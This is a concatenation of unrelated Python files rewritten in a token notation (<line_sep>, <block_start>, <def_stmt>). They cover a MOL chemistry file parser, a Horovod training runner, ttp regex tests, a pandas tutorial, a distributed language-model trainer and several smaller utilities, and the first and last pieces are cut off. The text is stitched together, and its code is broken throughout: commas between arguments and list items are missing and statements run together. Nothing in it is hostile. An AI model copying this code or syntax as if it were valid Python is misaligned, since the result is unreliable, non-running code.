real_panel_database.comment(institute=institute_obj case=case_obj user=user_obj link="" variant=variant_obj comment_level="specific" )<line_sep><yield>{"adapter":real_panel_database "variant":variant_obj "case":real_panel_database.case(case_obj["_id"]) }<block_end>@pytest.fixture<def_stmt>parsed_gene <block_start>gene_info={"hgnc_id":1 "hgnc_symbol":"AAA" "ensembl_id":"ENSG1" "chrom":"1" "start":10 "end":100 "build":"37" }<line_sep><return>gene_info<block_end> |
# This source code is part of the Biotite package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
__name__="biotite.structure.io.mol"<line_sep>__author__="<NAME>"<line_sep>__all__=["MOLFile"]<import_stmt>datetime<import_from_stmt>warnings warn<import_stmt>numpy<as>np<import_from_stmt>...atoms AtomArray<import_from_stmt>....file TextFile InvalidFileError<import_from_stmt>...error BadStructureError<import_from_stmt>..ctab read_structure_from_ctab write_structure_to_ctab<line_sep># Number of header lines
N_HEADER=3<line_sep>DATE_FORMAT="%d%m%y%H%M"<class_stmt>MOLFile(TextFile)<block_start>"""
This class represents a file in MOL format, which is used to store
structure information for small molecules. :footcite:`Dalby1992`
Since its use is intended for single small molecules, it stores
less atom annotation information than the macromolecular structure
formats:
Only the atom positions, charges, elements and bonds can be read
from the file; chain and residue information is missing.
This class can also be used to parse the first structure from an SDF
file, as the SDF format extends the MOL format.
References
----------
.. footbibliography::
Examples
--------
>>> from os.path import join
>>> mol_file = MOLFile.read(join(path_to_structures, "molecules", "TYR.sdf"))
>>> atom_array = mol_file.get_structure()
>>> print(atom_array)
0 N 1.320 0.952 1.428
0 C -0.018 0.429 1.734
0 C -0.103 0.094 3.201
0 O 0.886 -0.254 3.799
0 C -0.274 -0.831 0.907
0 C -0.189 -0.496 -0.559
0 C 1.022 -0.589 -1.219
0 C -1.324 -0.102 -1.244
0 C 1.103 -0.282 -2.563
0 C -1.247 0.210 -2.587
0 C -0.032 0.118 -3.252
0 O 0.044 0.420 -4.574
0 O -1.279 0.184 3.842
0 H 1.977 0.225 1.669
0 H 1.365 1.063 0.426
0 H -0.767 1.183 1.489
0 H 0.473 -1.585 1.152
0 H -1.268 -1.219 1.134
0 H 1.905 -0.902 -0.683
0 H -2.269 -0.031 -0.727
0 H 2.049 -0.354 -3.078
0 H -2.132 0.523 -3.121
0 H -0.123 -0.399 -5.059
0 H -1.333 -0.030 4.784
"""<def_stmt>__init__ self<block_start>super().__init__()<line_sep># empty header lines
self.lines=[""]<times>N_HEADER<block_end><def_stmt>get_header self<block_start>"""
Get the header from the MOL file.
Returns
-------
mol_name : str
The name of the molecule.
initials : str
The author's initials.
program : str
The program name.
time : datetime
The time of file creation.
dimensions : str
Dimensional codes.
scaling_factors : str
Scaling factors.
energy : str
Energy from modeling program.
registry_number : str
MDL registry number.
comments : str
Additional comments.
"""<line_sep>mol_name=self.lines[0].strip()<line_sep>initials=self.lines[1][0:2].strip()<line_sep>program=self.lines[1][2:10].strip()<line_sep>time=datetime.datetime.strptime(self.lines[1][10:20] DATE_FORMAT)<line_sep>dimensions=self.lines[1][20:22].strip()<line_sep>scaling_factors=self.lines[1][22:34].strip()<line_sep>energy=self.lines[1][34:46].strip()<line_sep>registry_number=self.lines[1][46:52].strip()<line_sep>comments=self.lines[2].strip()<line_sep><return>mol_name initials program time dimensions scaling_factors energy registry_number comments<block_end><def_stmt>set_header self mol_name initials="" program="" time=<none> dimensions="" scaling_factors="" energy="" registry_number="" comments=""<block_start>"""
Set the header for the MOL file.
Parameters
----------
mol_name : str
The name of the molecule.
initials : str, optional
The author's initials. Maximum length is 2.
program : str, optional
The program name. Maximum length is 8.
time : datetime or date, optional
The time of file creation.
dimensions : str, optional
Dimensional codes. Maximum length is 2.
scaling_factors : str, optional
Scaling factors. Maximum length is 12.
energy : str, optional
Energy from modeling program. Maximum length is 12.
registry_number : str, optional
MDL registry number. Maximum length is 6.
comments : str, optional
Additional comments.
"""<if_stmt>time<is><none><block_start>time=datetime.datetime.now()<block_end>time_str=time.strftime(DATE_FORMAT)<line_sep>self.lines[0]=str(mol_name)<line_sep>self.lines[1]=(f"{initials:>2}"<concat>f"{program:>8}"<concat>f"{time_str:>10}"<concat>f"{dimensions:>2}"<concat>f"{scaling_factors:>12}"<concat>f"{energy:>12}"<concat>f"{registry_number:>6}")<line_sep>self.lines[2]=str(comments)<block_end><def_stmt>get_structure self<block_start>"""
Get an :class:`AtomArray` from the MOL file.
Returns
-------
array : AtomArray
This :class:`AtomArray` contains the optional ``charge``
annotation and has an associated :class:`BondList`.
All other annotation categories, except ``element`` are
empty.
"""<line_sep>ctab_lines=_get_ctab_lines(self.lines)<if_stmt>len(ctab_lines)<eq>0<block_start><raise>InvalidFileError("File does not contain structure data")<block_end><return>read_structure_from_ctab(ctab_lines)<block_end><def_stmt>set_structure self atoms<block_start>"""
Set the :class:`AtomArray` for the file.
Parameters
----------
atoms : AtomArray
The array to be saved into this file.
Must have an associated :class:`BondList`.
"""<line_sep>self.lines=self.lines[:N_HEADER]+write_structure_to_ctab(atoms)<block_end><block_end><def_stmt>_get_ctab_lines lines<block_start><for_stmt>i,line enumerate(lines)<block_start><if_stmt>line.startswith("M END")<block_start><return>lines[N_HEADER:i+1]<block_end><block_end><return>lines[N_HEADER:]<block_end> |
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
<import_from_stmt>typing List Tuple<import_stmt>numpy<as>np<import_from_stmt>emukit.core.loop.user_function UserFunctionWrapper<def_stmt>hennig2D <arrow>Tuple[UserFunctionWrapper List[Tuple[float float]]]<block_start>r"""2D toy integrand coined by <NAME>.
.. math::
f(x) = e^{-x'Sx -\sin(3\|x\|^2)}
:return: The wrapped test function, and the integrals bounds
(the latter default to [-3, 3]^2).
"""<line_sep>integral_bounds=2<times>[(-3.0 3.0)]<line_sep><return>UserFunctionWrapper(_hennig2D) integral_bounds<block_end><def_stmt>_hennig2D x:np.ndarray S:np.ndarray=<none><arrow>np.ndarray<block_start>"""
:param x: Locations for evaluation (num_points, 2).
:param S: Optional 2x2 matrix defining the quadratic form; defaults to [[1, 0.5], [0.5, 1]].
:return: The function values at x, shape (num_points, 1).
"""<if_stmt>S<is><none><block_start>S=np.array([[1 0.5] [0.5 1]])<block_end>f=np.exp(-np.sin(3<times>np.sum(x<power>2 axis=1))-np.sum((x@S)<times>x axis=1))<line_sep><return>np.reshape(f [x.shape[0] 1])<block_end> |
<def_stmt>get_strob_numbers num_digits<block_start><if_stmt><not>num_digits<block_start><return>[""]<block_end><elif_stmt>num_digits<eq>1<block_start><return>["0" "1" "8"]<block_end>smaller_strob_numbers=get_strob_numbers(num_digits-2)<line_sep>strob_numbers=list()<for_stmt>x smaller_strob_numbers<block_start>strob_numbers.extend(["1"+x+"1" "6"+x+"9" "9"+x+"6" "8"+x+"8" ])<block_end><return>strob_numbers<block_end># Tests
<assert_stmt>get_strob_numbers(1)<eq>['0' '1' '8']<assert_stmt>get_strob_numbers(2)<eq>['11' '69' '96' '88']<assert_stmt>get_strob_numbers(3)<eq>['101' '609' '906' '808' '111' '619' '916' '818' '181' '689' '986' '888']<line_sep> |
"""The :func:`deephyper.nas.run.horovod.run` function is used to evaluate a deep neural network by enabling data-parallelism with Horovod to the :func:`deephyper.nas.run.alpha.run` function. This function will automatically apply the linear scaling rule to the learning rate and batch size given the current number of ranks (i.e., the initial learning rate and batch size are scaled by the number of ranks).
"""<import_stmt>os<import_stmt>traceback<import_stmt>logging<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>deephyper.contrib.callbacks import_callback<import_stmt>horovod.tensorflow.keras<as>hvd<import_stmt>deephyper.nas.trainer._arch<as>a<import_from_stmt>deephyper.nas.trainer HorovodTrainer<import_from_stmt>deephyper.nas.run._util compute_objective load_config preproc_trainer save_history setup_data get_search_space <line_sep>logger=logging.getLogger(__name__)<line_sep># Default callbacks parameters
default_callbacks_config={"EarlyStopping":dict(monitor="val_loss" min_delta=0 mode="min" verbose=0 patience=0) "ModelCheckpoint":dict(monitor="val_loss" mode="min" save_best_only=<true> verbose=1 filepath="model.h5" save_weights_only=<false> ) "TensorBoard":dict(log_dir="" histogram_freq=0 batch_size=32 write_graph=<false> write_grads=<false> write_images=<false> update_freq="epoch" ) "CSVLogger":dict(filename="training.csv" append=<true>) "CSVExtendedLogger":dict(filename="training.csv" append=<true>) "TimeStopping":dict() "ReduceLROnPlateau":dict(patience=5 verbose=0) }<line_sep># Name of Callbacks reserved for root node
hvd_root_cb=["ModelCheckpoint" "Tensorboard" "CSVLogger" "CSVExtendedLogger"]<def_stmt>run_horovod config:dict<arrow>float<block_start>hvd.init()<line_sep># Threading configuration
<if_stmt>os.environ.get("OMP_NUM_THREADS" <none>)<is><not><none><block_start>logger.debug(f"OMP_NUM_THREADS is {os.environ.get('OMP_NUM_THREADS')}")<line_sep>num_intra=int(os.environ.get("OMP_NUM_THREADS"))<line_sep>tf.config.threading.set_intra_op_parallelism_threads(num_intra)<line_sep>tf.config.threading.set_inter_op_parallelism_threads(2)<block_end><if_stmt>os.environ.get("CUDA_VISIBLE_DEVICES")<is><not><none><block_start>devices=os.environ.get("CUDA_VISIBLE_DEVICES").split(",")<line_sep>os.environ["CUDA_VISIBLE_DEVICES"]=devices[hvd.rank()]<block_end>config["seed"]<line_sep>seed=config["seed"]<if_stmt>seed<is><not><none><block_start>np.random.seed(seed)<line_sep>tf.random.set_seed(seed)<block_end>load_config(config)<line_sep># Scale batch size and learning rate according to the number of ranks
initial_lr=config[a.hyperparameters][a.learning_rate]<line_sep>batch_size=config[a.hyperparameters][a.batch_size]<times>hvd.size()<line_sep>learning_rate=config[a.hyperparameters][a.learning_rate]<times>hvd.size()<line_sep>logger.info(f"Scaled: 'batch_size' from {config[a.hyperparameters][a.batch_size]} to {batch_size} ")<line_sep>logger.info(f"Scaled: 'learning_rate' from {config[a.hyperparameters][a.learning_rate]} to {learning_rate} ")<line_sep>config[a.hyperparameters][a.batch_size]=batch_size<line_sep>config[a.hyperparameters][a.learning_rate]=learning_rate<line_sep>input_shape,output_shape=setup_data(config)<line_sep>search_space=get_search_space(config input_shape output_shape seed=seed)<line_sep># Initialize Horovod
model_created=<false><try_stmt><block_start>model=search_space.sample(config["arch_seq"])<line_sep>model_created=<true><block_end><except_stmt><block_start>logger.info("Error: Model creation failed...")<line_sep>logger.info(traceback.format_exc())<block_end><if_stmt>model_created# Setup callbacks only
<block_start>callbacks=[# Horovod: broadcast initial variable states from rank 0 to all other processes.
# This is necessary to ensure consistent initialization of all workers when
# training is started with random weights or restored from a checkpoint.
hvd.callbacks.BroadcastGlobalVariablesCallback(0) # Horovod: average metrics among workers at the end of every epoch.
#
# Note: This callback must be in the list before the ReduceLROnPlateau,
# TensorBoard or other metrics-based callbacks.
hvd.callbacks.MetricAverageCallback() # Horovod: using `lr = 1.0 * hvd.size()` from the very beginning leads to worse final
# accuracy. Scale the learning rate `lr = 1.0` ---> `lr = 1.0 * hvd.size()` during
# the first five epochs. See https://arxiv.org/abs/1706.02677 for details.
#! initial_lr argument is not available in horovod==0.19.0
hvd.callbacks.LearningRateWarmupCallback(warmup_epochs=5 verbose=0 initial_lr=initial_lr) ]<line_sep>cb_requires_valid=<false># Callbacks requires validation data
callbacks_config=config[a.hyperparameters].get(a.callbacks {})<if_stmt>callbacks_config<is><not><none><block_start><for_stmt>cb_name,cb_conf callbacks_config.items()<block_start><if_stmt>cb_name<in>default_callbacks_config# cb_name in hvd_root_cb implies hvd.rank() == 0
<block_start><if_stmt><not>(cb_name<in>hvd_root_cb)<or>hvd.rank()<eq>0<block_start>default_callbacks_config[cb_name].update(cb_conf)<line_sep># Import and create corresponding callback
Callback=import_callback(cb_name)<line_sep>callbacks.append(Callback(**default_callbacks_config[cb_name]))<if_stmt>cb_name<in>["EarlyStopping"]<block_start>cb_requires_valid="val"<in>cb_conf["monitor"].split("_")<block_end><block_end><block_end><else_stmt><block_start>logger.error(f"'{cb_name}' is not an accepted callback!")<block_end><block_end><block_end>trainer=HorovodTrainer(config=config model=model)<line_sep>trainer.callbacks.extend(callbacks)<line_sep>last_only,with_pred=preproc_trainer(config)<line_sep>last_only=last_only<and><not>cb_requires_valid<line_sep>history=trainer.train(with_pred=with_pred last_only=last_only)<line_sep># save history
<if_stmt>hvd.rank()<eq>0<block_start>save_history(config.get("log_dir" <none>) history config)<block_end>result=compute_objective(config["objective"] history)<block_end><else_stmt># penalising actions if model cannot be created
<block_start>result=-1<block_end><if_stmt>result<l>-10<block_start>result=-10<block_end><return>result<block_end> |
<import_from_stmt>.onelinerizer onelinerize<line_sep> |
<import_stmt>sys<line_sep>sys.path.insert(0 "../..")<import_stmt>pprint<import_stmt>logging<line_sep>logging.basicConfig(level="INFO")<import_from_stmt>ttp ttp<def_stmt>test_pipe_separated_regexes <block_start>template="""
<input load="text">
Protocol Address Age (min) Hardware Addr Type Interface
Internet 10.12.13.1 98 0950.5785.5cd1 ARPA FastEthernet2.13
Internet 10.12.13.2 98 0950.5785.5cd2 ARPA Loopback0
Internet 10.12.13.3 131 0150.7685.14d5 ARPA GigabitEthernet2.13
Internet 10.12.13.4 198 0950.5C8A.5c41 ARPA GigabitEthernet2.17
</input>
<vars>
INTF_RE = r"GigabitEthernet\\S+|Fast\\S+"
</vars>
<group name="arp_test">
Internet {{ ip | re("IP")}} {{ age | re(r"\\d+") }} {{ mac }} ARPA {{ interface | re("INTF_RE") }}
</group>
"""<line_sep>parser=ttp(template=template)<line_sep>parser.parse()<line_sep>res=parser.result()<line_sep># pprint.pprint(res)
<assert_stmt>res<eq>[[{"arp_test":[{"age":"98" "interface":"FastEthernet2.13" "ip":"10.12.13.1" "mac":"0950.5785.5cd1" } {"age":"131" "interface":"GigabitEthernet2.13" "ip":"10.12.13.3" "mac":"0150.7685.14d5" } {"age":"198" "interface":"GigabitEthernet2.17" "ip":"10.12.13.4" "mac":"0950.5C8A.5c41" } ]}]]<block_end># test_pipe_separated_regexes()
<def_stmt>test_multiple_inline_regexes <block_start>template="""
<input load="text">
Protocol Address Age (min) Hardware Addr Type Interface
Internet 10.12.13.1 98 0950.5785.5cd1 ARPA FastEthernet2.13
Internet 10.12.13.2 98 0950.5785.5cd2 ARPA Loopback0
Internet 10.12.13.3 131 0150.7685.14d5 ARPA GigabitEthernet2.13
Internet 10.12.13.4 198 0950.5C8A.5c41 ARPA GigabitEthernet2.17
</input>
<vars>
INTF_RE = r"GigabitEthernet\\S+|Fast\\S+"
</vars>
<group name="arp_test">
Internet {{ ip }} {{ age }} {{ mac }} ARPA {{ interface | re(r"GigabitEthernet\\S+") | re(r"Fast\\S+") }}
</group>
"""<line_sep>parser=ttp(template=template)<line_sep>parser.parse()<line_sep>res=parser.result()<line_sep># pprint.pprint(res)
<assert_stmt>res<eq>[[{"arp_test":[{"age":"98" "interface":"FastEthernet2.13" "ip":"10.12.13.1" "mac":"0950.5785.5cd1" } {"age":"131" "interface":"GigabitEthernet2.13" "ip":"10.12.13.3" "mac":"0150.7685.14d5" } {"age":"198" "interface":"GigabitEthernet2.17" "ip":"10.12.13.4" "mac":"0950.5C8A.5c41" } ]}]]<block_end># test_multiple_inline_regexes()
<def_stmt>test_MAC_regex_formatter <block_start>template="""
<input load="text">
Protocol Address Age (min) Hardware Addr Type Interface
Internet 10.12.13.2 98 0950:5785:5cd2 ARPA Loopback0
Internet 10.12.13.3 131 0150.7685.14d5 ARPA GigabitEthernet2.13
Internet 10.12.13.1 98 0950-5785-5cd1 ARPA FastEthernet2.13
Internet 10.12.13.4 198 09:50:5C:8A:5c:41 ARPA GigabitEthernet2.17
Internet 10.12.13.5 198 09.50.5C.8A.5c.41 ARPA GigabitEthernet2.17
Internet 10.12.13.6 198 09-50-5C-8A-5c-41 ARPA GigabitEthernet2.17
Internet 10.12.13.6 198 09505C8A5c41 ARPA GigabitEthernet2.will_not_match
Internet 10.12.13.6 198 09505C8:A5c41 ARPA GigabitEthernet2.will_not_match
Internet 10.12.13.6 198 09505C.8.A5c41 ARPA GigabitEthernet2.will_not_match
</input>
<group name="arp_test">
Internet {{ ip }} {{ age }} {{ mac | MAC }} ARPA {{ interface }}
</group>
"""<line_sep>parser=ttp(template=template)<line_sep>parser.parse()<line_sep>res=parser.result()<line_sep># pprint.pprint(res)
<assert_stmt>res<eq>[[{"arp_test":[{"age":"98" "interface":"Loopback0" "ip":"10.12.13.2" "mac":"0950:5785:5cd2" } {"age":"131" "interface":"GigabitEthernet2.13" "ip":"10.12.13.3" "mac":"0150.7685.14d5" } {"age":"98" "interface":"FastEthernet2.13" "ip":"10.12.13.1" "mac":"0950-5785-5cd1" } {"age":"198" "interface":"GigabitEthernet2.17" "ip":"10.12.13.4" "mac":"09:50:5C:8A:5c:41" } {"age":"198" "interface":"GigabitEthernet2.17" "ip":"10.12.13.5" "mac":"09.50.5C.8A.5c.41" } {"age":"198" "interface":"GigabitEthernet2.17" "ip":"10.12.13.6" "mac":"09-50-5C-8A-5c-41" } ]}]]<block_end># test_MAC_regex_formatter()
|
# View more python tutorials on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
"""
Please note, this code is only for python 3+. If you are using python 2+, please modify the code accordingly.
"""<import_from_future_stmt> print_function<import_stmt>pandas<as>pd<import_stmt>numpy<as>np<line_sep>dates=pd.date_range('20130101' periods=6)<line_sep>df=pd.DataFrame(np.random.randn(6 4) index=dates columns=['A' 'B' 'C' 'D'])<line_sep>df.iloc[2 2]=1111<line_sep>df.loc['2013-01-03' 'D']=2222<line_sep>df.A[df.A<g>0]=0<line_sep>df['F']=np.nan<line_sep>df['G']=pd.Series([1 2 3 4 5 6] index=pd.date_range('20130101' periods=6))<line_sep>print(df)<line_sep> |
# coding=utf-8
<import_stmt>torch<import_stmt>torch.distributed<as>dist<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_stmt>torch.multiprocessing<as>mp<import_from_stmt>biglm BIGLM<import_from_stmt>data Vocab DataLoader s2xy<import_from_stmt>adam AdamWeightDecayOptimizer<import_from_stmt>optim Optim<import_stmt>argparse os<import_stmt>random<def_stmt>parse_config <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--embed_dim' type=int)<line_sep>parser.add_argument('--ff_embed_dim' type=int)<line_sep>parser.add_argument('--num_heads' type=int)<line_sep>parser.add_argument('--layers' type=int)<line_sep>parser.add_argument('--dropout' type=float)<line_sep>parser.add_argument('--train_data' type=str)<line_sep>parser.add_argument('--dev_data' type=str)<line_sep>parser.add_argument('--vocab' type=str)<line_sep>parser.add_argument('--min_occur_cnt' type=int)<line_sep>parser.add_argument('--batch_size' type=int)<line_sep>parser.add_argument('--warmup_steps' type=int)<line_sep>parser.add_argument('--lr' type=float)<line_sep>parser.add_argument('--smoothing' type=float)<line_sep>parser.add_argument('--weight_decay' type=float)<line_sep>parser.add_argument('--max_len' type=int)<line_sep>parser.add_argument('--min_len' type=int)<line_sep>parser.add_argument('--print_every' type=int)<line_sep>parser.add_argument('--save_every' type=int)<line_sep>parser.add_argument('--epoch' type=int)<line_sep>parser.add_argument('--start_from' type=str default=<none>)<line_sep>parser.add_argument('--save_dir' type=str)<line_sep>parser.add_argument('--approx' type=str default='none')<line_sep>parser.add_argument('--fp16' action='store_true')<line_sep>parser.add_argument('--world_size' type=int)<line_sep>parser.add_argument('--gpus' type=int)<line_sep>parser.add_argument('--MASTER_ADDR' type=str)<line_sep>parser.add_argument('--MASTER_PORT' type=str)<line_sep>parser.add_argument('--start_rank' type=int)<line_sep>parser.add_argument('--backend' type=str)<line_sep><return>parser.parse_args()<block_end><def_stmt>update_lr optimizer lr<block_start><for_stmt>param_group optimizer.param_groups<block_start>param_group['lr']=lr<block_end><block_end><def_stmt>average_gradients model<block_start>""" Gradient averaging. 
"""<line_sep>normal=<true><line_sep>size=float(dist.get_world_size())<for_stmt>param model.parameters()<block_start><if_stmt>param.grad<is><not><none><block_start>dist.all_reduce(param.grad.data op=dist.ReduceOp.SUM)<line_sep>param.grad.data<augdiv>size<block_end><else_stmt><block_start>normal=<false><line_sep><break><block_end><block_end><return>normal<block_end><def_stmt>eval_epoch lm_args model lm_vocab local_rank label batch_acm<block_start>ds=[]<with_stmt>open(lm_args.dev_data "r")<as>f<block_start><for_stmt>line f<block_start>line=line.strip()<if_stmt>line<block_start>ds.append(line)<block_end><block_end><block_end>batch_size=10<line_sep>batches=round(len(ds)/batch_size)<line_sep>idx=0<line_sep>avg_nll=0.<line_sep>avg_ppl=0.<line_sep>avg_acc=0.<line_sep>count_bsz=0.<line_sep>count_tok=0.<while_stmt>idx<l>len(ds)<block_start>cplb=ds[idx:idx+batch_size]<line_sep>ys_truth,ys_inp,msk=s2xy(cplb lm_vocab lm_args.max_len lm_args.min_len)<line_sep>ys_truth=ys_truth.cuda(local_rank)<line_sep>ys_inp=ys_inp.cuda(local_rank)<line_sep>msk=msk.cuda(local_rank)<line_sep>acc,nll,ppl,toks,bsz=model.ppl(ys_truth ys_inp msk)<line_sep>avg_acc<augadd>acc<line_sep>avg_nll<augadd>nll<line_sep>avg_ppl<augadd>ppl<line_sep>count_bsz<augadd>bsz<line_sep>count_tok<augadd>toks<line_sep>idx<augadd>batch_size<block_end>print('validating: label %s, batch_acm %d, acc %.6f, nll %.6f, ppl %.6f'%(label batch_acm avg_acc/count_tok avg_nll/count_bsz avg_ppl/count_bsz) flush=<true>)<block_end><def_stmt>run args local_rank<block_start>""" Distributed Synchronous """<line_sep>torch.manual_seed(1234)<line_sep>vocab=Vocab(args.vocab min_occur_cnt=args.min_occur_cnt specials=[])<if_stmt>(args.world_size<eq>1<or>dist.get_rank()<eq>0)<block_start>print("vocab.size = %d"%vocab.size flush=<true>)<block_end>model=BIGLM(local_rank vocab args.embed_dim args.ff_embed_dim args.num_heads args.dropout args.layers args.smoothing args.approx)<if_stmt>args.start_from<is><not><none><block_start>ckpt=torch.load(args.start_from map_location='cpu')<line_sep>model.load_state_dict(ckpt['model'])<block_end>model=model.cuda(local_rank)<if_stmt>args.world_size<g>1<block_start>torch.manual_seed(1234+dist.get_rank())<line_sep>random.seed(5678+dist.get_rank())<block_end>optimizer=Optim(model.embed_dim args.lr args.warmup_steps torch.optim.Adam(model.parameters() lr=0 betas=(0.9 0.998) eps=1e-9))<if_stmt>args.start_from<is><not><none><block_start>optimizer.load_state_dict(ckpt['optimizer'])<block_end>#train_data = DataLoader(vocab, args.train_data+"0"+str(local_rank), args.batch_size, args.max_len, args.min_len)
train_data=DataLoader(vocab args.train_data args.batch_size args.max_len args.min_len)<line_sep>batch_acm=0<line_sep>acc_acm,nll_acm,ppl_acm,ntokens_acm,nxs,npairs_acm,loss_acm=0. 0. 0. 0. 0. 0. 0.<while_stmt><true><block_start><if_stmt>train_data.epoch_id<g>args.epoch<block_start><break><block_end>model.train()<for_stmt>truth,inp,msk train_data<block_start>batch_acm<augadd>1<line_sep>truth=truth.cuda(local_rank)<line_sep>inp=inp.cuda(local_rank)<line_sep>msk=msk.cuda(local_rank)<line_sep>model.zero_grad()<line_sep>res,loss,acc,nll,ppl,ntokens,npairs=model(truth inp msk)<line_sep>loss_acm<augadd>loss.item()<line_sep>acc_acm<augadd>acc<line_sep>nll_acm<augadd>nll<line_sep>ppl_acm<augadd>ppl<line_sep>ntokens_acm<augadd>ntokens<line_sep>npairs_acm<augadd>npairs<line_sep>nxs<augadd>npairs<line_sep>loss.backward()<if_stmt>args.world_size<g>1<block_start>average_gradients(model)<block_end>torch.nn.utils.clip_grad_norm_(model.parameters() 1.0)<line_sep>optimizer.step()<if_stmt>(args.world_size<eq>1<or>dist.get_rank()<eq>0)<and>batch_acm%args.print_every<eq>-1%args.print_every<block_start>print('batch_acm %d, loss %.3f, acc %.3f, nll %.3f, ppl %.3f, x_acm %d, lr %.6f'%(batch_acm loss_acm/args.print_every acc_acm/ntokens_acm nll_acm/nxs ppl_acm/nxs npairs_acm optimizer._rate) flush=<true>)<line_sep>acc_acm,nll_acm,ppl_acm,ntokens_acm,loss_acm,nxs=0. 0. 0. 0. 0. 0.<block_end><if_stmt>(args.world_size<eq>1<or>dist.get_rank()<eq>0)<and>batch_acm%args.save_every<eq>-1%args.save_every<block_start><if_stmt><not>os.path.exists(args.save_dir)<block_start>os.mkdir(args.save_dir)<block_end>torch.save({'args':args 'model':model.state_dict() 'optimizer':optimizer.state_dict()} '%s/epoch%d_batch_%d'%(args.save_dir train_data.epoch_id batch_acm))<line_sep>model.eval()<line_sep>eval_epoch(args model vocab local_rank "epoch-"+str(train_data.epoch_id)+"-acm-"+str(batch_acm) batch_acm)<line_sep>model.train()<block_end><block_end><block_end><block_end><def_stmt>init_processes args local_rank fn backend='nccl'<block_start>""" Initialize the distributed environment. """<line_sep>os.environ['MASTER_ADDR']=args.MASTER_ADDR<line_sep>os.environ['MASTER_PORT']=args.MASTER_PORT<line_sep>dist.init_process_group(backend rank=args.start_rank+local_rank world_size=args.world_size)<line_sep>fn(args local_rank)<block_end><if_stmt>__name__<eq>"__main__"<block_start>mp.set_start_method('spawn')<line_sep>args=parse_config()<if_stmt>args.world_size<eq>1<block_start>run(args 0)<line_sep>exit(0)<block_end>processes=[]<for_stmt>rank range(args.gpus)<block_start>p=mp.Process(target=init_processes args=(args rank run args.backend))<line_sep>p.start()<line_sep>processes.append(p)<block_end><for_stmt>p processes<block_start>p.join()<block_end><block_end> |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/monitoring.statistics.ipynb (unless otherwise specified).
__all__=['get_alignment_metrics']<line_sep># Cell
<import_stmt>torch<import_from_stmt>..utils.utils get_mask_from_lengths<def_stmt>get_alignment_metrics alignments average_across_batch=<true> input_lengths=<none> output_lengths=<none><block_start>alignments=alignments.transpose(1 2)# [B, dec, enc] -> [B, enc, dec]
<if_stmt>input_lengths<eq><none><block_start>input_lengths=torch.ones(alignments.size(0) device=alignments.device)<times>(alignments.shape[1]-1)<line_sep># [B] # 147
<block_end><if_stmt>output_lengths<eq><none><block_start>output_lengths=torch.ones(alignments.size(0) device=alignments.device)<times>(alignments.shape[2]-1)<block_end># [B] # 767
batch_size=alignments.size(0)<line_sep>optimums=torch.sqrt(input_lengths.double().pow(2)+output_lengths.double().pow(2)).view(batch_size)<line_sep># [B, enc, dec] -> [B, dec], [B, dec]
values,cur_idxs=torch.max(alignments 1)<line_sep>cur_idxs=cur_idxs.float()<line_sep>prev_indx=torch.cat((cur_idxs[: 0][: <none>] cur_idxs[: :-1]) dim=1)<line_sep>dist=((prev_indx-cur_idxs).pow(2)+1).pow(0.5)# [B, dec]
dist.masked_fill_(~get_mask_from_lengths(output_lengths max_len=dist.size(1)) 0.0)<line_sep># set dist of padded to zero
dist=dist.sum(dim=(1))# get total dist for each B
diagonalness=(dist+1.4142135)/optimums# dist / optimal dist
maxes=alignments.max(axis=1)[0].mean(axis=1)<if_stmt>average_across_batch<block_start>diagonalness=diagonalness.mean()<line_sep>maxes=maxes.mean()<block_end>output={}<line_sep>output["diagonalness"]=diagonalness<line_sep>output["max"]=maxes<line_sep><return>output<block_end> |
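A shape-only usage sketch, assuming the repository's get_mask_from_lengths utility imported above is available on the path; the batch size and sequence lengths are arbitrary:

import torch

B, dec_len, enc_len = 2, 160, 40
# soft attention weights as a decoder would emit them: [B, dec, enc], rows summing to 1
alignments = torch.softmax(torch.randn(B, dec_len, enc_len), dim=-1)
metrics = get_alignment_metrics(alignments)
print(metrics["diagonalness"], metrics["max"])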
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Confusion matrix related metrics."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_stmt>tensorflow.python.framework dtypes<import_from_stmt>tensorflow.python.ops confusion_matrix<as>cm<def_stmt>confusion_matrix labels predictions num_classes=<none> dtype=dtypes.int32 name=<none> weights=<none><block_start>"""Deprecated. Use tf.confusion_matrix instead."""<line_sep><return>cm.confusion_matrix(labels=labels predictions=predictions num_classes=num_classes dtype=dtype name=name weights=weights)<block_end> |
# Copyright 2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
DLA primitives and full network models.
